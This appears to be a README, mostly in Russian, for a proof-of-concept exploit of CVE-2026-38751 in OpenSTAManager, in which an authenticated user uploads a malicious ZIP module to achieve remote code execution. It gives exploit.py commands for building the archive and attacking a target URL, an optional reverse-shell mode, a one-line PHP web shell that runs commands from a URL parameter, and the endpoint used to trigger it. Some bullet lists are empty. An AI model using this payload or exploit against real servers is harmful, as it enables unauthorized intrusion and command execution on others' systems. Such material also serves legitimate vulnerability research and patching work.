
This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE).
Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2026-38751, затрагивающий OpenSTAManager ≤ 2.10.
Уязвимость позволяет аутентифицированному злоумышленнику загрузить вредоносный модуль через функциональность обновления модулей, что приводит к произвольной загрузке файлов и удалённому выполнению кода (RCE).
modules/aggiornamenti/upload_modules.php)Функциональность обновления модулей позволяет аутентифицированным пользователям загружать ZIP-модули без надлежащей проверки содержимого файлов или границ выполнения.
Злоумышленник может создать вредоносный модуль, содержащий PHP-полезные нагрузки, которые затем развёртываются в корневой директории веб-сервера и выполняются в контексте приложения.
Это приводит к:
Успешная эксплуатация позволяет:
python exploit.py --build
Создаёт:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Опциональный режим обратной оболочки:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Пример полезной нагрузки
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
В случае успеха следующая конечная точка выполняет системные команды:
/modules/run/evil.php?cmd=id
Этот проект предназначен для:
Не используйте против систем без явного разрешения.
Обнаружение может различаться в зависимости от конфигурации сервера. В некоторых развёртываниях прямое выполнение PHP в каталогах модулей может быть отключено. Время активации модуля может потребовать повторных попыток.